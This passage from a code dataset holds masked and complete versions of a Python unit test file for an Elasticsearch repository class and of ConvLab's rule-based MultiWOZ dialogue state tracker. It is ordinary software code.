@mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_missing_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (True, \n 'ERROR: Missing repo name or' +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_dir(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_name(self, mock_es, 
mock_repo):\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo2, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (False, None)\n )\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_default(self, mock_es, mock_repo):\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir), (False,\n None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n<mask token>\nsys.path.append(os.getcwd())\n<mask token>\n__version__ = version.__version__\n\n\nclass Elasticsearch(object):\n \"\"\"Class: ElasticSearch\n\n Description: Class representation of the Elasticsearch class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, host_list, port=9200):\n \"\"\"Method: __init__\n\n Description: Initialization instance of the class.\n\n Arguments:\n\n \"\"\"\n self.hosts = host_list\n self.port = port\n self.info_status = {'cluster_name': 'ClusterName', 'name': 'servername'\n }\n\n\nclass UnitTest(unittest.TestCase):\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n self.host_list = ['host1', 'host2']\n self.repo = 'reponame'\n self.repo2 = 'reponame2'\n self.repo3 = 'reponame3'\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = '/dir/path/dump2'\n self.nodes_data = {'serverid1': {'name': 'hostname1', 'settings': {\n 'path': {'data': ['/dir/data1'], 'logs': ['/dir/logs1']}}},\n 'serverid2': {'name': 'hostname2', 'settings': {'path': {'data':\n ['/dir/data2'], 'logs': ['/dir/logs2']}}}}\n self.health_data = {'status': 'green', 'cluster_name': 'ClusterName'}\n self.dump = '/dir/path/dump'\n self.repo_list = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict2 = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}, 'reponame2': {'type': 'dbdump',\n 'settings': {'location': '/dir/path/dump2'}}}\n\n 
@mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_created_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository creation failure: ' +\n ' reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_detected_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository not detected: reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', 
mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_missing_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (True, \n 'ERROR: Missing repo name or' +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_dir(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def 
test_no_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo2, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (False, None)\n )\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_default(self, mock_es, mock_repo):\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir), (False,\n None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: elasticsearchrepo_create_repo.py\n\n Description: Unit testing of create_repo in\n elastic_class.ElasticSearchRepo class.\n\n Usage:\n test/unit/elastic_class/elasticsearchrepo_create_repo.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport os\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n# Third-party\nimport mock\n\n# Local\nsys.path.append(os.getcwd())\nimport elastic_class\nimport version\n\n__version__ = version.__version__\n\n\nclass Elasticsearch(object):\n\n \"\"\"Class: ElasticSearch\n\n Description: Class representation of the Elasticsearch class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, host_list, port=9200):\n\n \"\"\"Method: __init__\n\n Description: Initialization instance of the class.\n\n Arguments:\n\n \"\"\"\n\n self.hosts = host_list\n self.port = port\n self.info_status = {\"cluster_name\": \"ClusterName\",\n \"name\": \"servername\"}\n\n\nclass UnitTest(unittest.TestCase):\n\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n\n self.host_list = [\"host1\", \"host2\"]\n self.repo = \"reponame\"\n self.repo2 = \"reponame2\"\n self.repo3 = \"reponame3\"\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = \"/dir/path/dump2\"\n self.nodes_data = {\"serverid1\": {\"name\": \"hostname1\", \"settings\":\n {\"path\": {\"data\": [\"/dir/data1\"],\n \"logs\": [\"/dir/logs1\"]}}},\n \"serverid2\": {\"name\": \"hostname2\", \"settings\":\n {\"path\": {\"data\": [\"/dir/data2\"],\n \"logs\": [\"/dir/logs2\"]}}}}\n self.health_data = {\"status\": \"green\", 
\"cluster_name\": \"ClusterName\"}\n self.dump = \"/dir/path/dump\"\n self.repo_list = {\"reponame\": {\"type\": \"dbdump\", \"settings\":\n {\"location\": self.dump}}}\n self.repo_dict = {\"reponame\": {\"type\": \"dbdump\", \"settings\":\n {\"location\": self.dump}}}\n self.repo_dict2 = {\"reponame\": {\"type\": \"dbdump\", \"settings\":\n {\"location\": self.dump}},\n \"reponame2\": {\"type\": \"dbdump\", \"settings\":\n {\"location\": \"/dir/path/dump2\"}}}\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": False}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_not_created_repo(self, mock_es, mock_repo):\n\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(\n els.create_repo(self.repo3, self.repo_dir),\n (True,\n \"ERROR: Repository creation failure: \" +\n \" reponame3, /dir/path/dump2\"))\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": True}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_not_detected_repo(self, mock_es, mock_repo):\n\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = 
self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(\n els.create_repo(self.repo3, self.repo_dir),\n (True,\n \"ERROR: Repository not detected: reponame3, /dir/path/dump2\"))\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": False}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_missing_repo_name(self, mock_es, mock_repo):\n\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(\n els.create_repo(repo_dir=self.repo_dir),\n (True,\n \"ERROR: Missing repo name or\" +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": True}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_no_repo_dir(self, mock_es, mock_repo):\n\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, 
repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": True}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_no_repo_name(self, mock_es, mock_repo):\n\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo2,\n repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir),\n (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch(\"elastic_class.create_snapshot_repo\",\n mock.Mock(return_value={\"acknowledged\": True}))\n @mock.patch(\"elastic_class.ElasticSearch.update_status\",\n mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.is_active\", mock.Mock(return_value=True))\n @mock.patch(\"elastic_class.get_repo_list\")\n @mock.patch(\"elastic_class.elasticsearch.Elasticsearch\")\n def test_default(self, mock_es, mock_repo):\n\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,\n repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir),\n (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n",
"step-ids": [
10,
12,
13,
14,
16
]
}
|
[
10,
12,
13,
14,
16
] |
<|reserved_special_token_0|>
class RuleDST(Tracker):
<|reserved_special_token_0|>
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix +
'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
if not isinstance(user_act, dict):
raise Exception(
"Expect user_act to be <class 'dict'> type but get {}.".
format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception(
'Error: domain <{}> not in new belief state'.
format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(
self.value_dict, domain, k, v)
else:
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'
.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RuleDST(Tracker):
<|reserved_special_token_0|>
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix +
'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
if not isinstance(user_act, dict):
raise Exception(
"Expect user_act to be <class 'dict'> type but get {}.".
format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception(
'Error: domain <{}> not in new belief state'.
format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(
self.value_dict, domain, k, v)
else:
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'
.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
def init_session(self):
self.state = init_state()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RuleDST(Tracker):
"""Rule based DST which trivially updates new values from NLU result to states."""
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix +
'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
if not isinstance(user_act, dict):
raise Exception(
"Expect user_act to be <class 'dict'> type but get {}.".
format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception(
'Error: domain <{}> not in new belief state'.
format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(
self.value_dict, domain, k, v)
else:
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'
.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
def init_session(self):
self.state = init_state()
<|reserved_special_token_1|>
import copy
import json
import os
import convlab
from convlab.modules.dst.multiwoz.dst_util import init_state
from convlab.modules.dst.multiwoz.dst_util import normalize_value
from convlab.modules.dst.state_tracker import Tracker
from convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA
class RuleDST(Tracker):
"""Rule based DST which trivially updates new values from NLU result to states."""
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix +
'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
if not isinstance(user_act, dict):
raise Exception(
"Expect user_act to be <class 'dict'> type but get {}.".
format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception(
'Error: domain <{}> not in new belief state'.
format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(
self.value_dict, domain, k, v)
else:
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'
.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
def init_session(self):
self.state = init_state()
<|reserved_special_token_1|>
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import copy
import json
import os
import convlab
from convlab.modules.dst.multiwoz.dst_util import init_state
from convlab.modules.dst.multiwoz.dst_util import normalize_value
from convlab.modules.dst.state_tracker import Tracker
from convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA
class RuleDST(Tracker):
"""Rule based DST which trivially updates new values from NLU result to states."""
def __init__(self):
Tracker.__init__(self)
self.state = init_state()
prefix = os.path.dirname(os.path.dirname(convlab.__file__))
self.value_dict = json.load(open(prefix+'/data/multiwoz/value_dict.json'))
def update(self, user_act=None):
# print('------------------{}'.format(user_act))
if not isinstance(user_act, dict):
raise Exception('Expect user_act to be <class \'dict\'> type but get {}.'.format(type(user_act)))
previous_state = self.state
new_belief_state = copy.deepcopy(previous_state['belief_state'])
new_request_state = copy.deepcopy(previous_state['request_state'])
for domain_type in user_act.keys():
domain, tpe = domain_type.lower().split('-')
if domain in ['unk', 'general', 'booking']:
continue
if tpe == 'inform':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if k is None:
continue
try:
assert domain in new_belief_state
except:
raise Exception('Error: domain <{}> not in new belief state'.format(domain))
domain_dic = new_belief_state[domain]
assert 'semi' in domain_dic
assert 'book' in domain_dic
if k in domain_dic['semi']:
nvalue = normalize_value(self.value_dict, domain, k, v)
# if nvalue != v:
# _log('domain {} slot {} value {} -> {}'.format(domain, k, v, nvalue))
new_belief_state[domain]['semi'][k] = nvalue
elif k in domain_dic['book']:
new_belief_state[domain]['book'][k] = v
elif k.lower() in domain_dic['book']:
new_belief_state[domain]['book'][k.lower()] = v
elif k == 'trainID' and domain == 'train':
new_belief_state[domain]['book'][k] = normalize_value(self.value_dict, domain, k, v)
else:
# raise Exception('unknown slot name <{}> of domain <{}>'.format(k, domain))
with open('unknown_slot.log', 'a+') as f:
f.write('unknown slot name <{}> of domain <{}>\n'.format(k, domain))
elif tpe == 'request':
for k, v in user_act[domain_type]:
k = REF_SYS_DA[domain.capitalize()].get(k, k)
if domain not in new_request_state:
new_request_state[domain] = {}
if k not in new_request_state[domain]:
new_request_state[domain][k] = 0
new_state = copy.deepcopy(previous_state)
new_state['belief_state'] = new_belief_state
new_state['request_state'] = new_request_state
new_state['user_action'] = user_act
self.state = new_state
return self.state
def init_session(self):
self.state = init_state()
|
flexible
|
{
"blob_id": "8de82d09c8a9a1c1db59b0cac9cf8dda04f35847",
"index": 3335,
"step-1": "<mask token>\n\n\nclass RuleDST(Tracker):\n <mask token>\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 